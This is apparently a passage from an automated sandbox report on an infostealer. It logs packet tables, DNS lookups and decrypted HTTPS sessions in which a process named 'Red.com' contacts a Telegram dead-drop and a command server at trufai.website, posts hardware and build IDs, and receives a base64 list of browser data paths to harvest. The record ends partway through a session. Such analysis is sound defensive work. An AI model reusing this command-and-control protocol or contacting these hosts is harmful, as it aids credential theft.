Jan 3, 2025 14:31:00.588865995 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.588886023 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.589072943 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.589077950 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.589121103 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.589224100 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.589251041 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.589262962 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.589274883 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.589344978 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.589448929 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.589459896 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.598809958 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.628355026 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.628460884 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.628489017 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.628521919 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.628525972 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.628546000 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.628565073 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.628575087 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.628612995 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.628633022 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.628676891 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.628688097 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.628750086 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.628757954 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.628783941 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.628798008 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.628824949 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.628844023 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.628904104 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.628915071 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.628958941 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.628969908 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.629039049 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.629060030 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.629086018 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.629105091 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.629115105 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:00.629122019 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:00.675914049 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:01.181260109 CET	443	49817	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:01.181343079 CET	49817	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:01.197583914 CET	49817	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:01.197588921 CET	443	49817	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:01.209728003 CET	49817	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:01.209733963 CET	443	49817	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:02.301040888 CET	443	49817	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:02.301063061 CET	443	49817	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:02.301115990 CET	49817	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:02.301124096 CET	443	49817	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:02.301134109 CET	49817	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:02.301172972 CET	49817	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:02.301404953 CET	49817	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:02.301422119 CET	443	49817	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:02.304286003 CET	49828	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:02.304322004 CET	443	49828	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:02.304405928 CET	49828	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:02.304604053 CET	49828	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:02.304613113 CET	443	49828	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:02.955128908 CET	443	49828	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:02.957372904 CET	49828	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:02.957762003 CET	49828	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:02.957767010 CET	443	49828	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:02.959474087 CET	49828	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:02.959480047 CET	443	49828	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:03.643595934 CET	443	49828	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:03.643649101 CET	443	49828	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:03.643670082 CET	49828	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:03.643697023 CET	443	49828	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:03.643709898 CET	49828	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:03.643770933 CET	49828	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:03.643775940 CET	443	49828	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:03.643841028 CET	443	49828	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:03.643888950 CET	49828	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:03.644525051 CET	49828	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:03.644534111 CET	443	49828	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:03.664819002 CET	49839	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:03.664855957 CET	443	49839	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:03.664925098 CET	49839	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:03.665210962 CET	49839	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:03.665222883 CET	443	49839	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:04.338323116 CET	443	49839	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:04.338406086 CET	49839	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:04.338763952 CET	49839	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:04.338769913 CET	443	49839	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:04.340635061 CET	49839	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:04.340641022 CET	443	49839	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:05.024247885 CET	443	49839	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:05.024317980 CET	49839	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:05.024339914 CET	443	49839	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:05.024384975 CET	49839	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:05.024405003 CET	443	49839	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:05.024452925 CET	49839	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:05.025154114 CET	49839	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:05.025163889 CET	443	49839	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:06.468055964 CET	49723	80	192.168.2.4	199.232.210.172
Jan 3, 2025 14:31:06.468115091 CET	49724	80	192.168.2.4	199.232.210.172
Jan 3, 2025 14:31:06.473005056 CET	80	49723	199.232.210.172	192.168.2.4
Jan 3, 2025 14:31:06.473068953 CET	49723	80	192.168.2.4	199.232.210.172
Jan 3, 2025 14:31:06.473299026 CET	80	49724	199.232.210.172	192.168.2.4
Jan 3, 2025 14:31:06.473351955 CET	49724	80	192.168.2.4	199.232.210.172
Jan 3, 2025 14:31:08.325916052 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:08.326014042 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:08.326090097 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:08.326108932 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:08.326927900 CET	49806	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:08.326945066 CET	443	49806	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:08.756838083 CET	49874	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:08.756858110 CET	443	49874	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:08.756915092 CET	49874	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:08.757374048 CET	49874	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:08.757385969 CET	443	49874	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:09.422029018 CET	443	49874	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:09.422125101 CET	49874	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:09.422593117 CET	49874	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:09.422606945 CET	443	49874	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:09.424129963 CET	49874	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:09.424134970 CET	443	49874	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:10.115590096 CET	443	49874	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:10.115647078 CET	49874	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:10.115657091 CET	443	49874	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:10.115703106 CET	49874	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:10.115892887 CET	49874	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:10.115916967 CET	443	49874	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:10.117393970 CET	49881	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:10.117434978 CET	443	49881	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:10.117507935 CET	49881	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:10.117683887 CET	49881	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:10.117698908 CET	443	49881	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:10.761145115 CET	443	49881	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:10.761204958 CET	49881	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:10.761677980 CET	49881	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:10.761683941 CET	443	49881	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:10.763376951 CET	49881	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:10.763384104 CET	443	49881	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:11.458415985 CET	443	49881	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:11.458484888 CET	443	49881	116.203.13.109	192.168.2.4
Jan 3, 2025 14:31:11.458687067 CET	49881	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:11.458755970 CET	49881	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:31:11.458766937 CET	443	49881	116.203.13.109	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 14:29:59.190606117 CET	54191	53	192.168.2.4	1.1.1.1
Jan 3, 2025 14:29:59.209223986 CET	53	54191	1.1.1.1	192.168.2.4
Jan 3, 2025 14:30:18.049974918 CET	138	138	192.168.2.4	192.168.2.255
Jan 3, 2025 14:30:28.869942904 CET	53528	53	192.168.2.4	1.1.1.1
Jan 3, 2025 14:30:28.877824068 CET	53	53528	1.1.1.1	192.168.2.4
Jan 3, 2025 14:30:29.787112951 CET	49398	53	192.168.2.4	1.1.1.1
Jan 3, 2025 14:30:29.798376083 CET	53	49398	1.1.1.1	192.168.2.4
Jan 3, 2025 14:30:40.911345959 CET	53	56190	1.1.1.1	192.168.2.4
Jan 3, 2025 14:30:41.070269108 CET	53	63416	1.1.1.1	192.168.2.4
Jan 3, 2025 14:30:41.192569017 CET	63363	53	192.168.2.4	1.1.1.1
Jan 3, 2025 14:30:41.192713022 CET	52370	53	192.168.2.4	1.1.1.1
Jan 3, 2025 14:30:41.199419022 CET	53	63363	1.1.1.1	192.168.2.4
Jan 3, 2025 14:30:41.199459076 CET	53	52370	1.1.1.1	192.168.2.4
Jan 3, 2025 14:30:42.042687893 CET	53	60978	1.1.1.1	192.168.2.4
Jan 3, 2025 14:30:43.074733973 CET	53	65386	1.1.1.1	192.168.2.4
Jan 3, 2025 14:30:44.792138100 CET	64986	53	192.168.2.4	1.1.1.1
Jan 3, 2025 14:30:44.792285919 CET	54863	53	192.168.2.4	1.1.1.1
Jan 3, 2025 14:30:44.795790911 CET	53	52357	1.1.1.1	192.168.2.4
Jan 3, 2025 14:30:44.798945904 CET	53	64986	1.1.1.1	192.168.2.4
Jan 3, 2025 14:30:44.799062014 CET	53	54863	1.1.1.1	192.168.2.4
Jan 3, 2025 14:30:45.788912058 CET	61817	53	192.168.2.4	1.1.1.1
Jan 3, 2025 14:30:45.789112091 CET	50541	53	192.168.2.4	1.1.1.1
Jan 3, 2025 14:30:45.795617104 CET	53	50541	1.1.1.1	192.168.2.4
Jan 3, 2025 14:30:45.795739889 CET	53	61817	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 3, 2025 14:29:59.190606117 CET	192.168.2.4	1.1.1.1	0xa52d	Standard query (0)	yOVsZEivtLSqqovnrmQMTfS.yOVsZEivtLSqqovnrmQMTfS	A (IP address)	IN (0x0001)	false
Jan 3, 2025 14:30:28.869942904 CET	192.168.2.4	1.1.1.1	0x175b	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Jan 3, 2025 14:30:29.787112951 CET	192.168.2.4	1.1.1.1	0xc9d	Standard query (0)	trufai.website	A (IP address)	IN (0x0001)	false
Jan 3, 2025 14:30:41.192569017 CET	192.168.2.4	1.1.1.1	0x6b71	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 14:30:41.192713022 CET	192.168.2.4	1.1.1.1	0x5d1f	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 3, 2025 14:30:44.792138100 CET	192.168.2.4	1.1.1.1	0x1e56	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 14:30:44.792285919 CET	192.168.2.4	1.1.1.1	0x556e	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Jan 3, 2025 14:30:45.788912058 CET	192.168.2.4	1.1.1.1	0x92d6	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 14:30:45.789112091 CET	192.168.2.4	1.1.1.1	0x634f	Standard query (0)	play.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 3, 2025 14:29:59.209223986 CET	1.1.1.1	192.168.2.4	0xa52d	Name error (3)	yOVsZEivtLSqqovnrmQMTfS.yOVsZEivtLSqqovnrmQMTfS	none	none	A (IP address)	IN (0x0001)	false
Jan 3, 2025 14:30:28.877824068 CET	1.1.1.1	192.168.2.4	0x175b	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Jan 3, 2025 14:30:29.798376083 CET	1.1.1.1	192.168.2.4	0xc9d	No error (0)	trufai.website		116.203.13.109	A (IP address)	IN (0x0001)	false
Jan 3, 2025 14:30:41.199419022 CET	1.1.1.1	192.168.2.4	0x6b71	No error (0)	www.google.com		172.217.18.4	A (IP address)	IN (0x0001)	false
Jan 3, 2025 14:30:41.199459076 CET	1.1.1.1	192.168.2.4	0x5d1f	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 3, 2025 14:30:44.798945904 CET	1.1.1.1	192.168.2.4	0x1e56	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 3, 2025 14:30:44.798945904 CET	1.1.1.1	192.168.2.4	0x1e56	No error (0)	plus.l.google.com		142.250.186.110	A (IP address)	IN (0x0001)	false
Jan 3, 2025 14:30:44.799062014 CET	1.1.1.1	192.168.2.4	0x556e	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 3, 2025 14:30:45.795739889 CET	1.1.1.1	192.168.2.4	0x92d6	No error (0)	play.google.com		142.250.185.142	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

t.me

trufai.website

www.google.com

apis.google.com

play.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	149.154.167.99	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:29 UTC	85	OUT	GET /w211et HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:30:29 UTC	512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 03 Jan 2025 13:30:29 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12311 Connection: close Set-Cookie: stel_ssid=37291b4eea3c3a5822_13498488262669703732; expires=Sat, 04 Jan 2025 13:30:29 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2025-01-03 13:30:29 UTC	12311	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 77 32 31 31 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @w211et</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:30 UTC	187	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:30:31 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:30:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-03 13:30:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:31 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----u3ecjek6fcj58ycbsj58 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:30:31 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 75 33 65 63 6a 65 6b 36 66 63 6a 35 38 79 63 62 73 6a 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 44 44 30 35 45 35 36 35 41 36 31 32 37 38 39 35 37 33 32 30 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 75 33 65 63 6a 65 6b 36 66 63 6a 35 38 79 63 62 73 6a 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 75 33 65 63 6a 65 6b 36 66 63 6a 35 38 79 63 62 73 6a 35 38 2d 2d 0d Data Ascii: ------u3ecjek6fcj58ycbsj58Content-Disposition: form-data; name="hwid"FDD05E565A612789573209-a33c7340-61ca------u3ecjek6fcj58ycbsj58Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------u3ecjek6fcj58ycbsj58--
2025-01-03 13:30:32 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:30:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-03 13:30:32 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|5a17db381a43ee3e4a357c45c7d2568a\|1\|0\|1\|1\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:33 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----qieknozmozu37qqqiwl6 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:30:33 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 71 69 65 6b 6e 6f 7a 6d 6f 7a 75 33 37 71 71 71 69 77 6c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 71 69 65 6b 6e 6f 7a 6d 6f 7a 75 33 37 71 71 71 69 77 6c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 71 69 65 6b 6e 6f 7a 6d 6f 7a 75 33 37 71 71 71 69 77 6c 36 0d 0a 43 6f 6e 74 Data Ascii: ------qieknozmozu37qqqiwl6Content-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------qieknozmozu37qqqiwl6Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------qieknozmozu37qqqiwl6Cont
2025-01-03 13:30:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:30:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-03 13:30:33 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:34 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----fcjeuk6x4wtjmycjwbai User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:30:34 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 66 63 6a 65 75 6b 36 78 34 77 74 6a 6d 79 63 6a 77 62 61 69 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 66 63 6a 65 75 6b 36 78 34 77 74 6a 6d 79 63 6a 77 62 61 69 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 66 63 6a 65 75 6b 36 78 34 77 74 6a 6d 79 63 6a 77 62 61 69 0d 0a 43 6f 6e 74 Data Ascii: ------fcjeuk6x4wtjmycjwbaiContent-Disposition: form-data; 